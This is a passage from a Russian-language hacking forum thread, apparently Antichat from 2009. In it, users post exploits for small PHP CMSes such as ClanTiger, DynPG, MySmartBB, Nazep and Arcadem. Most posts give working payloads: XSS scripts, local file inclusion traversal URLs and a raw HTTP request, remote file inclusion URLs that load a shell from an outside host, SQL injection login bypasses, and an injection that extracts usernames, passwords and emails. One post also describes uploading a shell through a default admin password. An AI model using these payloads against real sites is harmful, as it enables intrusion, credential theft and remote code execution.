ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #261  
Старый 13.12.2009, 00:11
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

^^ еще версия PHP >= 5.2.0
и не allow_url_open, а allow_url_include

Последний раз редактировалось Spyder; 13.12.2009 в 00:15..
 
Ответить с цитированием

  #262  
Старый 13.12.2009, 00:22
Аватар для [x60]unu
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

Product - ZAKRZAK
Version - 0.01
Active XSS
Url - http://localhost/index.php?page=gbook
Exploit
Код:
'"/><script>alert("xss");</script>
Раскрытые Пути
Код:
http://localhost/index.php?page=settings&part[]=
 
Ответить с цитированием

ClanTiger CMS 1.0<=1.1.3 Local File Inclusion
  #263  
Старый 13.12.2009, 18:16
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию ClanTiger CMS 1.0<=1.1.3 Local File Inclusion

ClanTiger CMS
Web site : http://www.clantiger.com
Vesrion : 1.0<=1.1.3


[Local File Inclusion]

Vuln file: functions/class.language.php [str:73]
PHP код:
        if(isset($_GET['lang']))
        {
            
$selectedLanguage $_GET['lang'];
        }
        else if(
$_COOKIE['lang'])
        {
            
$selectedLanguage $_COOKIE['lang'];
        }
        else
        {
            
// resort to default
            
$selectedLanguage $settings['language'];
        }
        
        
// see whether the language exists
        
if(!in_array($selectedLanguage,$this->validLanguages,true))
        {
            
$this->selectedLanguage $this->validLanguages[$settings['language']];
        }
        else
        {
            
$this->selectedLanguage $this->validLanguages[$selectedLanguage];
        }
        
        
        
// attempt to load in the translations file
        
if(!@include_once(ROOTPATH 'language/' strtolower($selectedLanguage) . '.php')) 
Exploit #1:
Код:
http://[host]/[path]/index.php?lang=../../../../../../../[local_file]%00
Exploit #2:
Код:
GET http://[host]/[path]/index.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: [host]
Content-Length: 59
Connection: Close
Cookie: lang=../../../../../../../[local_file]%00
Для успешной эксплуатации необходимо:
magic quotes = OFF
 
Ответить с цитированием

  #264  
Старый 14.12.2009, 20:11
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

DynPG CMS 4.0.0
Web site : http://www.dynpg.org
Vesrion : 4.0.0


[Remote File Inclusion]

Vuln file: counter.php [str:15]
PHP код:
    $inc = empty($_GET["inc"]) ? $_GET["inc"];

    if ( !empty(
$inc) ) {
        
# Aufruf des Counters ьber einen Link. $inc enthдlt dann die Datenbankkennung!

        
$inc_or   htmlentities(urldecode($inc));
        
$inc_head urldecode(str_replace('&amp;''&'$inc));
        
$inc      addslashes(strtolower($inc));

        if ( empty(
$GLOBALS["DefineRootToTool"]) ) {
            
$GLOBALS["DefineRootToTool"] = "";
        }

        require_once 
$GLOBALS["DefineRootToTool"]."config.php"
Exploit:
if register_globals = ON && allow_url_include = ON
Код:
http://[host]/[path]/counter.php?inc=1&DefineRootToTool=[shell]?
[Local File Inclusion]

Vuln file: languages.inc.php [str:5]
PHP код:
   global $lang_dpg;

   require_once 
dirname(__FILE__) . '/plugins/languages.php';
   require_once 
dirname(__FILE__) . '/localised/dynpg_backend/'.strtolower($_SESSION["LANGUAGE"]).'.lang.php'
Exploit:
if register_globals = ON && magic_quotes = OFF
Код:
http://[host]/[path]/languages.inc.php?_SESSION[LANGUAGE]=../../../../../../../../[local_file]%00
 
Ответить с цитированием

  #265  
Старый 15.12.2009, 11:40
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Программа: MySmartBB 1.1.0
Сайт: mysmartbb.com
Описание уязвимости: возможен обход авторизации
Уязвимый код login.php:
PHP код:
$password md5($_POST['T2']);
     
$check    $DB->sql_query("SELECT * FROM MySBB_member WHERE username='" $_POST['T1'] . "' AND password='" $password "'");
     
$num      $DB->sql_num_rows($check); 
эксплойт:
Код:
login: 'or+5=5#
password: asdfg
если версия MySQL = 5 то можно вывести данные из бд таким POST запросом:
Код:
T1='+and+1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((select+concat_ws(0x3a,username,password,email)+from+mysbb_member+limit+1),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((select+concat_ws(0x3a,username,password,email)+from+mysbb_member+limit+1),14)e)b)a)+--+&T2=1233&B1=%E3%E6%C7%DD%DE
 
Ответить с цитированием

  #266  
Старый 17.12.2009, 03:02
Аватар для Xcontrol212
Xcontrol212
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750

Репутация: 277


Отправить сообщение для Xcontrol212 с помощью ICQ
По умолчанию

AmiroCMS-Free-5.4.4.0
Раскрытие путей

Код:
http://localhost:7777/eshop_final.php
Код:
Fatal error: main() [function.require]: Failed opening required '_shared/code/includes/eshop_final.php' (include_path='.;/usr/local/php/PEAR') in C:\WebServers\home\localhost\www\AmiroCMS\home\localhost\www\eshop_final.php on line 4
Код:
http://localhost:7777/unattened.old.php
Код:
Parse error: syntax error, unexpected T_STRING in C:\WebServers\home\localhost\www\AmiroCMS\home\localhost\www\unattened.old.php on line 4
Уязвимую часть кода к сожалению не смогу показать,зазендено,потом выложу,когда раззендю
 
Ответить с цитированием

  #267  
Старый 19.12.2009, 00:31
Аватар для [x60]unu
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

Nazep
Product - Nazep
Version - 0.1.4.3

SQL injection
Код:
http://localhost/index/index.php?sec=-1'/**/union/**/all/**/select/**/version()/*
вывод
Код:
<title></title>
Admin Panel
Код:
http://localhost/admon/index.php
Login
login - 'or+1=1#
pass - 123456

Последний раз редактировалось [x60]unu; 19.12.2009 в 00:40..
 
Ответить с цитированием

  #268  
Старый 19.12.2009, 16:57
Аватар для Root-access
Root-access
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440

Репутация: 648
Отправить сообщение для Root-access с помощью ICQ
По умолчанию

Moscuito CMS (all vers) - блоговый движок на файлах.
PHPSELF XSS:
Код:
http://localhost/mosquito/%3E%3Cscript%3Ealert()%3C/script%3E
Заливка шелла: Админцентр (дефолтный пароль - pass)-> Новый (плагин) -> <?php include('http://site.com/sh.txt'); ?>
 
Ответить с цитированием

  #269  
Старый 20.12.2009, 00:14
Аватар для Bb0y
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

Arcadem Pro CMS [2.7]
xss пассивная:
[localhost]/index.php?cat="><script>alert();</script>
xss пассивная:
[localhost]/index.php?article="><script>alert();</script>
xss активная:
При регистрации, в поле "Логин" вписываем
Цитата:
"><script>alert();</script>
, регистрирумся. При просмотре игроков, статистики и т.д. будет выполняться ваш код.
xss активная:
[localhost]/index.php?loadpage=./includes/articleblock.php&articlecat=[number]
в строке поле комментария вводим
Цитата:
"><script>alert();</script>
и отправляем. При просмотре комментариев выполнится ваш код.
Blind SQL injection:
[localhost]/index.php?article=[number]+and+ascii(substring(version(),19,1))+--+Bb0y
уязвимый код:
PHP код:
$articleid $_GET['article'];

if (
is_numeric(intval($articleid)) == TRUE) {
   
$sql "SELECT * FROM AMCMS_articles WHERE articlekey=$articleid LIMIT 1;"

Последний раз редактировалось Bb0y; 20.12.2009 в 00:17..
 
Ответить с цитированием

  #270  
Старый 20.12.2009, 15:16
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Direct News, основная часть выше,изза переноса сообщения раззлетелись
RFI

Необходимо для правильной работы RFI! register_globals = ON and allow_url_open = ON!

file: /admin/inc.php
PHP код:
$from_inc true

header("Content-Type: text/html; charset=utf-8");

if (!
file_exists($rootpath .'/config.php')) {
    
header('Location: '$adminroot .'/install/');
    die();
}

// Compatibilite entre les versions de PHP
require_once $rootpath .'/library/lib.compatibility.php';

// gestion de session
require_once $rootpath .'/library/class.config.php';
require_once 
$rootpath .'/modules/panier/class.panier_article.php';
.... 
target:admin/inc.php?rootpath=http://yousite.ru/shellcode.txt?

Последний раз редактировалось m0Hze; 20.12.2009 в 19:00..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30
Основные методы взлома и защиты скриптов на Php DIAgen Авторские статьи 8 28.05.2006 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ